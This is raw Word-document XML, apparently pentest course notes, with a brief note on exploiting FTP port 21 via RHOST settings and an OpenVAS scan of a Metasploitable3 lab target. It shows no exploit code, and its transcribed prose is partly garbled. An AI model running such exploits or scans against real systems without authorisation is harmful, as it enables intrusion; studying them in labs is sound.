                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2097405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3807F026" w14:textId="77777777" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A"/>
    <w:p w14:paraId="19ECF1C4" w14:textId="548CB8F6" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A">
      <w:r>
        <w:t xml:space="preserve">As we are exploiting port </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wnot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> change RPORT and change RHOST to the target IP address. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF3EB8" w14:textId="77777777" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A"/>
    <w:p w14:paraId="769B21EB" w14:textId="17C6F558" w:rsidR="00DC6FA9" w:rsidRDefault="00844B36" w:rsidP="007D618A">
      <w:r w:rsidRPr="00844B36">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46BEDFE0" wp14:editId="02F73941">
            <wp:extent cx="5733415" cy="2112645"/>
            <wp:effectExtent l="0" t="0" r="635" b="1905"/>
            <wp:docPr id="34850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07273" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2112645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FAD79F" w14:textId="56EF5000" w:rsidR="00381D1D" w:rsidRDefault="00381D1D" w:rsidP="007D618A"/>
    <w:p w14:paraId="7AA14522" w14:textId="77777777" w:rsidR="00381D1D" w:rsidRDefault="00381D1D" w:rsidP="007D618A"/>
    <w:p w14:paraId="705FA62A" w14:textId="08DCAF13" w:rsidR="00381D1D" w:rsidRDefault="002509C0" w:rsidP="007D618A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002509C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OpenVAS</w:t>
      </w:r>
      <w:r w:rsidRPr="002509C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A7996" w14:textId="77777777" w:rsidR="002509C0" w:rsidRDefault="002509C0" w:rsidP="007D618A"/>
    <w:p w14:paraId="67E2951A" w14:textId="15DCEE11" w:rsidR="002509C0" w:rsidRDefault="00193CCD" w:rsidP="00193CCD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this lecture we are going to be carrying out a vulnerability scan on metasploitable3 in Linux. Previous SC from windows target now in this we are going to see what vulnerabilities we will be able to find on this Linux target we know that met SP table is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> box with a lot of vulnerabilities so we can see how we can make it open bus vulnerability scanner to scan that Linux and find out the vulnerabilities that existed in the metasploitable3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EDB2C3" w14:textId="77777777" w:rsidR="00193CCD" w:rsidRDefault="00193CCD" w:rsidP="007D618A"/>
    <w:p w14:paraId="555547B1" w14:textId="514261DD" w:rsidR="00193CCD" w:rsidRDefault="00193CCD" w:rsidP="007D618A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AB13592" wp14:editId="525E8A66">
            <wp:extent cx="5733415" cy="3063875"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="119798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85288" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3063875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC2F07A" w14:textId="77777777" w:rsidR="00193CCD" w:rsidRDefault="00193CCD" w:rsidP="007D618A"/>
    <w:p w14:paraId="212C3FF0" w14:textId="0ED43F04" w:rsidR="00193CCD" w:rsidRDefault="00307F63" w:rsidP="007D618A">
      <w:r>
        <w:tab/>
        <w:t>I have already log into my open ability scanner so what I’m going to do as we did in the previous job, I will just come up here scans and then tasks and then click on tasks all right so we just go and create a new task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64620FD4" w14:textId="51ADB4BB" w:rsidR="00307F63" w:rsidRDefault="00307F63" w:rsidP="007D618A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">So, we just go and create a new task. I just come up here and then task the task wizard and then click on it all right so we have launched the text wizard. I’m going to input the IP address of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. I will just click on start scan now this will proceed to scan the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3424C2F5" w14:textId="77777777" w:rsidR="00307F63" w:rsidRDefault="00307F63" w:rsidP="007D618A"/>
    <w:p w14:paraId="292377F6" w14:textId="6FB4AFED" w:rsidR="00307F63" w:rsidRDefault="00307F63" w:rsidP="007D618A">
      <w:r w:rsidRPr="00307F63">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01CE01BA" wp14:editId="17A0A20A">
            <wp:extent cx="5733415" cy="1948815"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="143742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23457" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="1948815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E3821" w14:textId="77777777" w:rsidR="00DF37C2" w:rsidRDefault="00DF37C2" w:rsidP="007D618A"/>
    <w:p w14:paraId="17CCCD1E" w14:textId="795FC60F" w:rsidR="00DF37C2" w:rsidRPr="002509C0" w:rsidRDefault="00DF37C2" w:rsidP="007D618A">
      <w:r>
        <w:t xml:space="preserve">So, what are they we are going to see what we are able to discover using the OpenVAS vulnerability scanner. We are and this is the result of our scan these are the abilities we were able to discover using the </w:t>
      </w:r>
      <w:r w:rsidR="00FB3892">
        <w:t>OpenVAS.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DF37C2" w:rsidRPr="002509C0" w:rsidSect="003B4604">
      <w:headerReference w:type="default" r:id="rId81"/>
      <w:footerReference w:type="default" r:id="rId82"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="576" w:footer="432"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5EE048" w14:textId="77777777" w:rsidR="00664EE2" w:rsidRDefault="00664EE2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A435A7B" w14:textId="77777777" w:rsidR="00664EE2" w:rsidRDefault="00664E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6DC92" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="67EEA394">
        <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
      </w:pict>
    </w:r>
  </w:p>
  <w:p w14:paraId="4658A5C1" w14:textId="14EF469B" w:rsidR="00C776D2" w:rsidRDefault="003B4604" w:rsidP="003B4604">
    <w:pPr>
      <w:jc w:val="center"/>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8FE18D" w14:textId="77777777" w:rsidR="00664EE2" w:rsidRDefault="00664EE2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="141B92F1" w14:textId="77777777" w:rsidR="00664EE2" w:rsidRDefault="00664EE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51FCB" w14:textId="68D5EA92" w:rsidR="00C776D2" w:rsidRDefault="00FA3A15">
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="5E4292F4" wp14:editId="3B0C74EE">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-1444461</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-342899</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="8618141" cy="1023938"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapTopAndBottom distT="114300" distB="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6796"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="8618141" cy="1023938"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:ln/>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6D2"/>
    <w:rsid w:val="0000430C"/>
    <w:rsid w:val="00004A28"/>
    <w:rsid w:val="00024E16"/>
    <w:rsid w:val="000335EC"/>
    <w:rsid w:val="000515CA"/>
    <w:rsid w:val="00071648"/>
    <w:rsid w:val="000A6815"/>
    <w:rsid w:val="000E7AF1"/>
    <w:rsid w:val="000E7EB5"/>
    <w:rsid w:val="00110F61"/>
    <w:rsid w:val="001231A3"/>
    <w:rsid w:val="00125C2B"/>
    <w:rsid w:val="001751A4"/>
    <w:rsid w:val="00180F3E"/>
    <w:rsid w:val="00184A1F"/>
    <w:rsid w:val="00193CCD"/>
    <w:rsid w:val="0019511B"/>
    <w:rsid w:val="001E3036"/>
    <w:rsid w:val="001E4710"/>
    <w:rsid w:val="00201A6D"/>
    <w:rsid w:val="002509C0"/>
    <w:rsid w:val="00252F3D"/>
    <w:rsid w:val="0025629C"/>
    <w:rsid w:val="00275AA1"/>
    <w:rsid w:val="00295928"/>
    <w:rsid w:val="002B02EA"/>
    <w:rsid w:val="002E7746"/>
    <w:rsid w:val="00307F63"/>
    <w:rsid w:val="003130C4"/>
    <w:rsid w:val="0032758E"/>
    <w:rsid w:val="00342B1C"/>
    <w:rsid w:val="003470A7"/>
    <w:rsid w:val="00351F81"/>
    <w:rsid w:val="00365B97"/>
    <w:rsid w:val="00381D1D"/>
    <w:rsid w:val="003A02DD"/>
    <w:rsid w:val="003B4604"/>
    <w:rsid w:val="003E2D71"/>
    <w:rsid w:val="0041451C"/>
    <w:rsid w:val="00422FAD"/>
    <w:rsid w:val="00427455"/>
    <w:rsid w:val="00433B58"/>
    <w:rsid w:val="004579B6"/>
    <w:rsid w:val="0048768A"/>
    <w:rsid w:val="004C1F59"/>
    <w:rsid w:val="004F7AEE"/>
    <w:rsid w:val="00514BBC"/>
    <w:rsid w:val="00576593"/>
    <w:rsid w:val="006336CC"/>
    <w:rsid w:val="00664EE2"/>
    <w:rsid w:val="006675CC"/>
    <w:rsid w:val="00692C09"/>
    <w:rsid w:val="006B196C"/>
    <w:rsid w:val="00755F3C"/>
    <w:rsid w:val="007B5E66"/>
    <w:rsid w:val="007C3E28"/>
    <w:rsid w:val="007D618A"/>
    <w:rsid w:val="007F7C07"/>
    <w:rsid w:val="00837DDA"/>
    <w:rsid w:val="00844B36"/>
    <w:rsid w:val="0088405A"/>
    <w:rsid w:val="008C60B7"/>
    <w:rsid w:val="008D1C36"/>
    <w:rsid w:val="008E2D87"/>
    <w:rsid w:val="008E3F46"/>
    <w:rsid w:val="008E58A6"/>
    <w:rsid w:val="009016A0"/>
    <w:rsid w:val="00944DA2"/>
    <w:rsid w:val="009611A5"/>
    <w:rsid w:val="00981FE9"/>
    <w:rsid w:val="009952C9"/>
    <w:rsid w:val="009A583C"/>
    <w:rsid w:val="009D4E63"/>
    <w:rsid w:val="009F35F6"/>
    <w:rsid w:val="009F3A2F"/>
    <w:rsid w:val="00A1514F"/>
    <w:rsid w:val="00AB773C"/>
    <w:rsid w:val="00AC2A19"/>
    <w:rsid w:val="00B23E9B"/>
    <w:rsid w:val="00B56870"/>
    <w:rsid w:val="00B96D59"/>
    <w:rsid w:val="00BE6490"/>
    <w:rsid w:val="00C1171C"/>
    <w:rsid w:val="00C40BAF"/>
    <w:rsid w:val="00C776D2"/>
    <w:rsid w:val="00C926ED"/>
    <w:rsid w:val="00C95FCD"/>
    <w:rsid w:val="00CC0549"/>
    <w:rsid w:val="00CC44D5"/>
    <w:rsid w:val="00CE7725"/>
    <w:rsid w:val="00D07A0F"/>
    <w:rsid w:val="00D73732"/>
    <w:rsid w:val="00D90AB5"/>
    <w:rsid w:val="00D94756"/>
    <w:rsid w:val="00DC6FA9"/>
    <w:rsid w:val="00DD35E5"/>
    <w:rsid w:val="00DF37C2"/>
    <w:rsid w:val="00DF4D60"/>
    <w:rsid w:val="00E715B9"/>
    <w:rsid w:val="00EA299B"/>
    <w:rsid w:val="00EE5BAE"/>
    <w:rsid w:val="00F20B08"/>
    <w:rsid w:val="00F413A1"/>
    <w:rsid w:val="00F47772"/>
    <w:rsid w:val="00FA3A15"/>
    <w:rsid w:val="00FB3892"/>
    <w:rsid w:val="00FD5721"/>
    <w:rsid w:val="00FE51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967B39"/>
  <w15:docId w15:val="{B3E6499F-61BC-4B83-B0F3-2CF2AAC52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3B4604"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003B4604"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B4604"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003B4604"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C60B7"/>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C60B7"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C3E28"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C3E28"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CE7725"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007D618A"/>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hyperlink" Target="http://testphp.vulnweb.com" TargetMode="External"/><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endnotes" Target="endnotes.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId82"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hyperlink" Target="http://testphp.vulnweb.com" TargetMode="External"/><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hyperlink" Target="https://github.com/MobSF/test_files/blob/master/android.apk" TargetMode="Externa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github.com/MobSF/Mobile-Security-Framework-MobSF" TargetMode="External"/><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testphp.vulnweb.com" TargetMode="External"/><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hyperlink" Target="http://127.0.0.1:8000" TargetMode="Externa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testhtml5.vulnweb.com/" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="setting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5243</TotalTime>
  <Pages>34</Pages>
  <Words>2619</Words>
  <Characters>14933</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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Manoj</cp:lastModifiedBy>
  <cp:revision>123</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-21T00:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-01T07:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>